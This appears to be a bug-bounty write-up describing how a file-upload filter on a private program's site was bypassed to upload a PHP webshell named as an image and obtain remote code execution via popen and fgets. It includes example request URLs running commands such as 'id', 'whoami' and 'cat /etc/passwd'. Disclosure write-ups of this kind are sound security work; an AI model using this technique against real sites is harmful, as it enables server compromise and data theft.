File Upload to RCE

Hi , My name is Ahmed Magdy :)

and i will be publishing my first Write-up for bug about a File Upload to RCE

Let’s go……

First of all, This was a private program, so I will refer to it with example.com or subdomain.domain

Here I can upload A Normal photo

( احمينا ياااا رب )

All file upload Profile updated successfully :)

alt=”photo here”

But not work with all ( alt=”photo here” )

cannot be displayed because it contains errors.

After bypass the filter upload it is work

Profile updated successfully

Wait some code in file work and some not work

Code HTML and JS and some PHP work but all parameter not work

All Commands in parameter not work and blocked

example.com/uploads/ (ids user) /lol.png.php?c=ls;id;whoami;

ِAnd all Commands not work

code HTML and JS and some PHP work but all parameter not work it is rce but all Commands block but is OK…

I report this because i can print phpinfo() severity P2

oh nice…

After 2 day and more search i ask some friend as Abdalla Tarek and Flex about is issue

After ( Al habd Al gamed ) with Tarek

كمان واحده و النبى ياريس 😂😂 كفايه بجي😂😂ء

Flex give my the solve this problem

Resource popen (command ,$mode )

Opens a pipe to a process executed by forking the command given by command…. Example: <?php $h = popen("ls","r");?>

Resource fgets (file,length)

Function returns a line from an open file…. Example:

$handle = fopen("inputfile.txt", "r");
if ($handle) {
    while (($line = fgets($handle)) !== false) {
        // process the line read.}
    fclose($handle);
}else {error opening the file.}

The site afraid and work after the two lines Flex,
And I wrote more than 20 lines and the site don’t afraid or work

happy and sad

example.com/uploads/96/lol.png.php?c=cat /etc/passwd

All Done

I report that as RCE the severity become P1 …. :)

Think you for your time :)

And finally, Thank you to read this write-up :)

Have a great day :)

I hope you enjoyed reading and I will be very happy if you have any feedback!!

Contact me if you want : Ahmed Magdy